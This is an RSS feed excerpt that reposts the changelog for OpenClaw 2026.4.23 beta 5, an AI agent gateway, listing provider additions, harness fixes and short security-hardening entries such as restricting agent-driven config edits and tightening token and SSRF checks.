<li>Gateway/security: fail closed on agent-driven <code>gateway config.apply</code>/<code>config.patch</code> runtime edits by allowlisting a narrow set of agent-tunable prompt, model, and mention-gating paths (including Telegram topic-level <code>requireMention</code>) instead of relying on a hand-maintained denylist of protected subtrees that could miss new sensitive config keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317956002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70726" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70726/hovercard" href="https://github.com/openclaw/openclaw/pull/70726">#70726</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Webhooks/security: re-resolve <code>SecretRef</code>-backed webhook route secrets on each request so <code>openclaw secrets reload</code> revokes the previous secret immediately instead of waiting for a gateway restart. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317967302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70727" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70727/hovercard" href="https://github.com/openclaw/openclaw/pull/70727">#70727</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw 2026.4.23 beta 5]]></title>
<description><![CDATA[2026.4.23
Changes

Providers/OpenAI: add image generation and reference-image editing through Codex OAuth, so openai/gpt-image-2 works without an OPENAI_API_KEY. Fixes #70703.
Providers/OpenRouter: add image generation and reference-image editing through image_generate, so OpenRouter image models...]]></description>
<link>https://tsecurity.de/de/3460952/downloads/openclaw-2026423-beta-5/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3460952/downloads/openclaw-2026423-beta-5/</guid>
<pubDate>Fri, 24 Apr 2026 12:30:32 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.23</h2>
<h3>Changes</h3>
<ul>
<li>Providers/OpenAI: add image generation and reference-image editing through Codex OAuth, so <code>openai/gpt-image-2</code> works without an <code>OPENAI_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317685103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70703" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70703/hovercard" href="https://github.com/openclaw/openclaw/issues/70703">#70703</a>.</li>
<li>Providers/OpenRouter: add image generation and reference-image editing through <code>image_generate</code>, so OpenRouter image models work with <code>OPENROUTER_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4142164318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55066" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55066/hovercard" href="https://github.com/openclaw/openclaw/issues/55066">#55066</a> via <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4275765906" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67668" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67668/hovercard" href="https://github.com/openclaw/openclaw/pull/67668">#67668</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/notamicrodose/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/notamicrodose">@notamicrodose</a>.</li>
<li>Image generation: let agents request provider-supported quality and output format hints, and pass OpenAI-specific background, moderation, compression, and user hints through the <code>image_generate</code> tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313875031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70503" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70503/hovercard" href="https://github.com/openclaw/openclaw/pull/70503">#70503</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>.</li>
<li>Agents/subagents: add optional forked context for native <code>sessions_spawn</code> runs so agents can let a child inherit the requester transcript when needed, while keeping clean isolated sessions as the default; includes prompt guidance, context-engine hook metadata, docs, and QA coverage.</li>
<li>Agents/tools: add optional per-call <code>timeoutMs</code> support for image, video, music, and TTS generation tools so agents can extend provider request timeouts only when a specific generation needs it.</li>
<li>Memory/local embeddings: add configurable <code>memorySearch.local.contextSize</code> with a 4096 default so local embedding contexts can be tuned for constrained hosts without patching the memory host. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314612454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70544" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70544/hovercard" href="https://github.com/openclaw/openclaw/pull/70544">#70544</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aalekh-sarvam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aalekh-sarvam">@aalekh-sarvam</a>.</li>
<li>Dependencies/Pi: update bundled Pi packages to <code>0.70.0</code>, use Pi's upstream <code>gpt-5.5</code> catalog metadata for OpenAI and OpenAI Codex, and keep only local <code>gpt-5.5-pro</code> forward-compat handling.</li>
<li>Codex harness: add structured debug logging for embedded harness selection decisions so <code>/status</code> stays simple while gateway logs explain auto-selection and Pi fallback reasons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318523130" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70760" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70760/hovercard" href="https://github.com/openclaw/openclaw/pull/70760">#70760</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Codex harness: route native <code>request_user_input</code> prompts back to the originating chat, preserve queued follow-up answers, and honor newer app-server command approval amendment decisions.</li>
<li>Codex harness/context-engine: redact context-engine assembly failures before logging, so fallback warnings do not serialize raw error objects. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319234861" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70809" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70809/hovercard" href="https://github.com/openclaw/openclaw/pull/70809">#70809</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>WhatsApp/onboarding: keep first-run setup entry loading off the Baileys runtime dependency path, so packaged QuickStart installs can show WhatsApp setup before runtime deps are staged. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320441218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70932" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70932/hovercard" href="https://github.com/openclaw/openclaw/issues/70932">#70932</a>.</li>
<li>Block streaming: suppress final assembled text after partial block-delivery aborts when the already-sent text chunks exactly cover the final reply, preventing duplicate replies without dropping unrelated short messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320362931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70921/hovercard" href="https://github.com/openclaw/openclaw/issues/70921">#70921</a>.</li>
<li>Codex harness/Windows: resolve npm-installed <code>codex.cmd</code> shims through PATHEXT before starting the native app-server, so <code>codex/*</code> models work without a manual <code>.exe</code> shim. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320274139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70913" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70913/hovercard" href="https://github.com/openclaw/openclaw/issues/70913">#70913</a>.</li>
<li>Slack/groups: classify MPIM group DMs as group chat context and suppress verbose tool/plan progress on Slack non-DM surfaces, so internal "Working…" traces no longer leak into rooms. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320271144" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70912" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70912/hovercard" href="https://github.com/openclaw/openclaw/issues/70912">#70912</a>.</li>
<li>Agents/replay: stop OpenAI/Codex transcript replay from synthesizing missing tool results while still preserving synthetic repair on Anthropic, Gemini, and Bedrock transport-owned sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208825313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61556" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61556/hovercard" href="https://github.com/openclaw/openclaw/pull/61556">#61556</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VictorJeon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VictorJeon">@VictorJeon</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Telegram/media replies: parse remote markdown image syntax into outbound media payloads on the final reply path, so Telegram group chats stop falling back to plain-text image URLs when the model or a tool emits <code>![...](...)</code> instead of a <code>MEDIA:</code> token. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258333933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66191" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66191/hovercard" href="https://github.com/openclaw/openclaw/issues/66191">#66191</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/apezam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/apezam">@apezam</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/WebChat: surface non-retryable provider failures such as billing, auth, and rate-limit errors from the embedded runner instead of logging <code>surface_error</code> and leaving webchat with no rendered error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308345521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70124" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70124/hovercard" href="https://github.com/openclaw/openclaw/issues/70124">#70124</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319670589" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70848" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70848/hovercard" href="https://github.com/openclaw/openclaw/pull/70848">#70848</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/truffle-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/truffle-dev">@truffle-dev</a>.</li>
<li>WhatsApp: unify outbound media normalization across direct sends and auto-replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mcaxtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mcaxtr">@mcaxtr</a>.</li>
<li>Memory/CLI: declare the built-in <code>local</code> embedding provider in the memory-core manifest, so standalone <code>openclaw memory status</code>, <code>index</code>, and <code>search</code> can resolve local embeddings just like the gateway runtime. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319498725" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70836" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70836/hovercard" href="https://github.com/openclaw/openclaw/issues/70836">#70836</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319903672" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70873/hovercard" href="https://github.com/openclaw/openclaw/pull/70873">#70873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattznojassist/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattznojassist">@mattznojassist</a>.</li>
<li>Gateway/WebChat: preserve image attachments for text-only primary models by offloading them as media refs instead of dropping them, so configured image tools can still inspect the original file. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287666211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68513/hovercard" href="https://github.com/openclaw/openclaw/issues/68513">#68513</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066225308" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44276" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44276/hovercard" href="https://github.com/openclaw/openclaw/issues/44276">#44276</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112734613" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51656/hovercard" href="https://github.com/openclaw/openclaw/issues/51656">#51656</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309685353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70212/hovercard" href="https://github.com/openclaw/openclaw/issues/70212">#70212</a>.</li>
<li>Plugins/Google Meet: hang up delegated Twilio calls on leave, clean up Chrome realtime audio bridges when launch fails, and use a flat provider-safe tool schema.</li>
<li>Media understanding: honor explicit image-model configuration before native-vision skips, including <code>agents.defaults.imageModel</code>, <code>tools.media.image.models</code>, and provider image defaults such as MiniMax VL when the active chat model is text-only. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079114113" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47614" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47614/hovercard" href="https://github.com/openclaw/openclaw/issues/47614">#47614</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231959911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63722" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63722/hovercard" href="https://github.com/openclaw/openclaw/issues/63722">#63722</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292840857" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69171/hovercard" href="https://github.com/openclaw/openclaw/issues/69171">#69171</a>.</li>
<li>Codex/media understanding: support <code>codex/*</code> image models through bounded Codex app-server image turns, while keeping <code>openai-codex/*</code> on the OpenAI Codex OAuth route and validating app-server responses against generated protocol contracts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309522289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70201" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70201/hovercard" href="https://github.com/openclaw/openclaw/issues/70201">#70201</a>.</li>
<li>Providers/OpenAI Codex: synthesize the <code>openai-codex/gpt-5.5</code> OAuth model row when Codex catalog discovery omits it, so cron and subagent runs do not fail with <code>Unknown model</code> while the account is authenticated.</li>
<li>Models/Codex: preserve Codex provider metadata when adding models from chat or CLI commands, so manually added Codex models keep the right auth and routing behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319321563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70820/hovercard" href="https://github.com/openclaw/openclaw/pull/70820">#70820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>Providers/OpenAI: route <code>openai/gpt-image-2</code> through configured Codex OAuth directly when an <code>openai-codex</code> profile is active, instead of probing <code>OPENAI_API_KEY</code> first.</li>
<li>Providers/OpenAI: harden image generation auth routing and Codex OAuth response parsing so fallback only applies to public OpenAI API routes and bounded SSE results. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>OpenAI/image generation: send reference-image edits as guarded multipart uploads instead of JSON data URLs, restoring complex multi-reference <code>gpt-image-2</code> edits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316931305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70642" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70642/hovercard" href="https://github.com/openclaw/openclaw/issues/70642">#70642</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dashhuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dashhuang">@dashhuang</a>.</li>
<li>Providers/OpenRouter: send image-understanding prompts as user text before image parts, restoring non-empty vision responses for OpenRouter multimodal models. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312662772" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70410" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70410/hovercard" href="https://github.com/openclaw/openclaw/issues/70410">#70410</a>.</li>
<li>Providers/Google: honor the private-network SSRF opt-in for Gemini image generation requests, so trusted proxy setups that resolve Google API hosts to private addresses can use <code>image_generate</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269431435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67216" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67216/hovercard" href="https://github.com/openclaw/openclaw/issues/67216">#67216</a>.</li>
<li>Agents/transport: stop embedded runs from lowering the process-wide undici stream timeouts, so slow Gemini image generation and other long-running provider requests no longer inherit short run-attempt headers timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312763316" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70423" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70423/hovercard" href="https://github.com/openclaw/openclaw/issues/70423">#70423</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giangthb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giangthb">@giangthb</a>.</li>
<li>Providers/OpenAI: honor the private-network SSRF opt-in for OpenAI-compatible image generation endpoints, so trusted LocalAI/LAN <code>image_generate</code> routes work without disabling SSRF checks globally. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221864091" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62879/hovercard" href="https://github.com/openclaw/openclaw/issues/62879">#62879</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/seitzbg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/seitzbg">@seitzbg</a>.</li>
<li>Providers/OpenAI: stop advertising the removed <code>gpt-5.3-codex-spark</code> Codex model through fallback catalogs, and suppress stale rows with a GPT-5.5 recovery hint.</li>
<li>Control UI/chat: persist assistant-generated images as authenticated managed media and accept paired-device tokens for assistant media fetches, so webchat history reloads keep showing generated images. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317927968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70719" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70719/hovercard" href="https://github.com/openclaw/openclaw/pull/70719">#70719</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318227484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70741" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70741/hovercard" href="https://github.com/openclaw/openclaw/pull/70741">#70741</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>.</li>
<li>Control UI/chat: queue Stop-button aborts across Gateway reconnects so a disconnected active run is canceled on reconnect instead of only clearing local UI state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317304097" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70673" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70673/hovercard" href="https://github.com/openclaw/openclaw/pull/70673">#70673</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</li>
<li>Memory/QMD: recreate stale managed QMD collections when startup repair finds the collection name already exists, so root memory narrows back to <code>MEMORY.md</code> instead of staying on broad workspace markdown indexing.</li>
<li>Agents/OpenAI: surface selected-model capacity failures from PI, Codex, and auto-reply harness paths with a model-switch hint instead of the generic empty-response error. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/QR: replace legacy <code>qrcode-terminal</code> QR rendering with bounded <code>qrcode-tui</code> helpers for plugin login/setup flows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4255382870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65969" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65969/hovercard" href="https://github.com/openclaw/openclaw/pull/65969">#65969</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Voice-call/realtime: wait for OpenAI session configuration before greeting or forwarding buffered audio, and reject non-allowlisted Twilio callers before stream setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4061033395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43501" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43501/hovercard" href="https://github.com/openclaw/openclaw/pull/43501">#43501</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/forrestblount/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/forrestblount">@forrestblount</a>.</li>
<li>ACPX/Codex: stop materializing <code>auth.json</code> bridge files for Codex ACP, Codex app-server, and Codex CLI runs; Codex-owned runtimes now use their normal <code>CODEX_HOME</code>/<code>~/.codex</code> auth path directly.</li>
<li>Auto-reply/system events: route async exec-event completion replies through the persisted session delivery context, so long-running command results return to the originating channel instead of being dropped when live origin metadata is missing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310392062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70258" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70258/hovercard" href="https://github.com/openclaw/openclaw/pull/70258">#70258</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wzfukui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wzfukui">@wzfukui</a>.</li>
<li>Gateway/sessions: extend the webchat session-mutation guard to <code>sessions.compact</code> and <code>sessions.compaction.restore</code>, so <code>WEBCHAT_UI</code> clients are rejected from compaction-side session mutations consistently with the existing patch/delete guards. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317846623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70716/hovercard" href="https://github.com/openclaw/openclaw/pull/70716">#70716</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>QA channel/security: reject non-HTTP(S) inbound attachment URLs before media fetch, and log rejected schemes so suspicious or misconfigured payloads are visible during debugging. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317761421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70708/hovercard" href="https://github.com/openclaw/openclaw/pull/70708">#70708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/install: link the host OpenClaw package into external plugins that declare <code>openclaw</code> as a peer dependency, so peer-only plugin SDK imports resolve after install without bundling a duplicate host package. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313294513" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70462" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70462/hovercard" href="https://github.com/openclaw/openclaw/pull/70462">#70462</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anishesg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anishesg">@anishesg</a>.</li>
<li>Plugins/Windows: refresh the packaged plugin SDK alias in place during bundled runtime dependency repair, so gateway and CLI plugin startup no longer race on <code>ENOTEMPTY</code>/<code>EPERM</code> after same-guest npm updates.</li>
<li>Teams/security: require shared Bot Framework audience tokens to name the configured Teams app via verified <code>appid</code> or <code>azp</code>, blocking cross-bot token replay on the global audience. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317946331" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70724/hovercard" href="https://github.com/openclaw/openclaw/pull/70724">#70724</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: resolve bundled plugin Jiti loads relative to the target plugin module instead of the central loader, so Bun global installs no longer hang while discovering bundled image providers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307757270" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70073/hovercard" href="https://github.com/openclaw/openclaw/pull/70073">#70073</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yidianyiko/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yidianyiko">@yidianyiko</a>.</li>
<li>Anthropic/CLI security: derive Claude CLI <code>bypassPermissions</code> from OpenClaw's existing YOLO exec policy, preserve explicit raw Claude <code>--permission-mode</code> overrides, and strip malformed permission-mode args instead of silently falling back to a bypass. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317943033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70723" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70723/hovercard" href="https://github.com/openclaw/openclaw/pull/70723">#70723</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Android/security: require loopback-only cleartext gateway connections on Android manual and scanned routes, so private-LAN and link-local <code>ws://</code> endpoints now fail closed unless TLS is enabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317940763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70722" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70722/hovercard" href="https://github.com/openclaw/openclaw/pull/70722">#70722</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
